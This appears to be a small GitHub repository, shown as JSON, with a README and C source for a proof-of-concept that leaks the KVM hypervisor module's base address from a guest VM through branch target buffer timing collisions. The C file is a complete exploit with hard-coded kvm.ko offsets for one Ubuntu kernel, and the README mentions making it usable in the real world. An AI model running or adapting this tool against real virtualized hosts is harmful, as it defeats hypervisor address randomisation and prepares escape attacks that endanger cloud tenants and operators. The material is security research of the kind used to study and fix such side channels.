[
  {
    "path": "README.md",
    "content": "# mario_baslr\n\n![alt text](https://github.com/felixwilhelm/mario_baslr/raw/master/baslr.png \"mario_baslr output\")\n\n\nThis repository contains a small Proof-of-Concept tool for leaking the base address of the KVM hypervisor kernel module (kvm.ko) from a guest VM. It does this by using a timing side-channel created by collisions in the branch target buffer (BTB) of modern Intel CPUs.\nThis approach is based on the great research paper [\"Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR\"] (http://www.cs.binghamton.edu/~dima/micro16.pdf) by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh. \n\nInterestingly, the authors of the original paper don't seem to have realised that their technique is not only usable for attacks against KASLR or other user-space tools but also works regardless of virtualization boundaries. This is an important difference to other hardware based timing\nattacks such as `prefetch`, which can only be used for addresses that are mapped in the execution context of the attacker. \n\nIn theory the BTB side-channel offers a generic way to bypass hypervisor/host ASLR in virtualized environments. However, there are a number of important restrictions:\n* As discussed in the linked paper, the BTB only uses bits 0-30 as hash input. This means ASLR implementations that also randomize the most significant bits of virtual addresses can only be weakened.\n* The BTB hashing mechanism does not seem to be very collision safe. This means the PoC tool might not always find a unique  base addresses and return multiple guesses.\n* The attacker needs a way to trigger execution of control-flow instructions in the target using its own CPU core. This is relatively easy for hypervisor code (by triggering a VM exit) but might be more difficult when targeting worker processes or device backends.\n\nOnly the second issue has an impact when targeting the KVM kernel module, making KVM the easiest target for this attack. 
\n\nThe offsets used in the PoC target kvm.ko as compiled for Ubuntu 16.04 with a 4.4.0-38-generic kernel. Future versions might include a fingerprinting mechanism to make this usable in the real world.\n"
  },
  {
    "path": "mario_baslr.c",
    "content": "/*\nmario_baslr.c\nFelix Wilhelm [fwilhelm@ernw.de]\n\nLeaks kvm.ko base address from a guest VM\nusing time delays created by branch target buffer\ncollisions.\n\nUsage:\n- change function + jump offsets for kvm_cpuid and kvm_emulate_hypercall\nto the correct values for the KVM version of your target.\n(todo: version fingerprinting)\n- compile with gcc -O2 (!)\n- if base address does not show up after a few tries increase MAX_SEARCH_ADDRESS\n  or NUM_RESULTS\n\nSee github.com/felixwilhelm/mario_baslr/ for more info.\n*/\n\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/mman.h>\n\n#define NUM_RESULTS 8\n\n#define MAX_SEARCH_ADDRESS 0xfc09f0000\n\nvoid cpuid(int code) {\n  asm volatile(\"cpuid\" : : \"a\"(code) : \"ebx\", \"ecx\", \"edx\");\n}\n\nuint64_t rdtsc() {\n  uint32_t high, low;\n  asm volatile(\".att_syntax\\n\\t\"\n               \"RDTSCP\\n\\t\"\n               : \"=a\"(low), \"=d\"(high)::);\n  return ((uint64_t)high << 32) | low;\n}\n\nuint64_t time_function(void (*funcptr)()) {\n  uint64_t start;\n  for (int i = 0; i < 50; i++) {\n    funcptr();\n  }\n  asm volatile(\"vmcall\" : : : \"eax\");\n  cpuid(0);\n  start = rdtsc();\n  funcptr();\n  uint64_t end = rdtsc();\n  cpuid(0);\n  return end - start;\n}\n\nvoid jump(void) {\n  asm volatile(\"jmp target\\n\\t\"\n               \"nop\\n\\t\"\n               \"nop\\n\\t\"\n               \"target:nop\\n\\t\"\n               \"nop\\n\\t\");\n}\n\nuint64_t move_and_time(uint64_t addr) {\n  void *mapped = mmap((void *)addr, 2048, PROT_READ | PROT_WRITE | PROT_EXEC,\n                      MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);\n  memcpy((void *)addr, jump, 512);\n  uint64_t res = 0;\n  for (int i = 0; i < 50; i++) {\n    res += time_function((void *)addr);\n  }\n  munmap(mapped, 2048);\n  return res / 50;\n}\n\ntypedef struct _testcase {\n  const char *function_name;\n  uint32_t function_offset;\n  uint16_t jump_offsets[4];\n} 
testcase;\n\ntypedef struct _result {\n  uint64_t timing;\n  uint64_t address;\n} result;\n\nint cmp(const void *a, const void *b) {\n  uint64_t ta = ((result *)a)->timing;\n  uint64_t tb = ((result *)b)->timing;\n  if (ta < tb)\n    return -1;\n  else if (ta > tb)\n    return 1;\n  return 0;\n}\n\nvoid search_module_base(testcase *t, result *results) {\n  uint64_t low = 0xfc0000000 + t->function_offset;\n  uint64_t high = MAX_SEARCH_ADDRESS;\n\n  memset(results, 0, sizeof(result) * NUM_RESULTS);\n\n  uint64_t sum = 0, count = 0;\n  for (uint64_t c = low; c <= high; c += 0x1000) {\n    sum += move_and_time(c);\n    count++;\n  }\n\n  uint64_t average = sum / count;\n\n  for (uint64_t c = low; c <= high; c += 0x1000) {\n    uint64_t timing = 0;\n    for (int i = 0; i < 4; i++) {\n      timing += move_and_time(c + t->jump_offsets[i]);\n    }\n\n    if (timing > (average * 8)) {\n      printf(\"[!] skipping outlier @ %lx : %ld\\n\", c, timing);\n      continue;\n    }\n\n    if (timing > results[0].timing) {\n      // printf(\"[.] 
new candidate @ %lx : %ld\\n\", c, timing);\n      results[0].timing = timing;\n      results[0].address = c;\n      qsort(results, NUM_RESULTS, sizeof(result), cmp);\n    }\n  }\n}\n\ntestcase kvm_cpuid = {.function_name = \"kvm_cpuid\",\n                      .function_offset = 0x3ead0,\n                      .jump_offsets = {0, 50, 69, 144}};\n\ntestcase kvm_emulate_hypercall = {\n    .function_name = \"kvm_emulate_hypercall\",\n    .function_offset = 0xf650,\n    .jump_offsets = {0, 47, 56, 66},\n};\n\nint main(int argc, char **argv) {\n  result r[NUM_RESULTS], r2[NUM_RESULTS];\n\n  search_module_base(&kvm_cpuid, r);\n  search_module_base(&kvm_emulate_hypercall, r2);\n\n  int hit = 0;\n\n  // Valid indices are 0..NUM_RESULTS-1; start at the last element.\n  for (int i = NUM_RESULTS - 1; i >= 0; i--) {\n    result a = r[i];\n    for (int j = NUM_RESULTS - 1; j >= 0; j--) {\n      result b = r2[j];\n      if (a.address - b.address ==\n          kvm_cpuid.function_offset - kvm_emulate_hypercall.function_offset) {\n        printf(\"[x] potential hit @ %lx : %lx\\n\", a.address, b.address);\n        printf(\"[x] kvm_cpuid @ %lx\\n\", 0xffffffff00000000 | a.address);\n        printf(\"[x] kvm_emulate_hypercall @ %lx\\n\",\n               0xffffffff00000000 | b.address);\n        printf(\"[x] potential kvm.ko base address @ %lx\\n\",\n               0xffffffff00000000 | (a.address - kvm_cpuid.function_offset));\n        hit = 1;\n      }\n    }\n  }\n\n  if (!hit) {\n    printf(\"[!] Did not find a possible match :(\\n[!] If you are sure your \"\n           \"offsets are correct try again.\\n\");\n  }\n}\n"
  }
]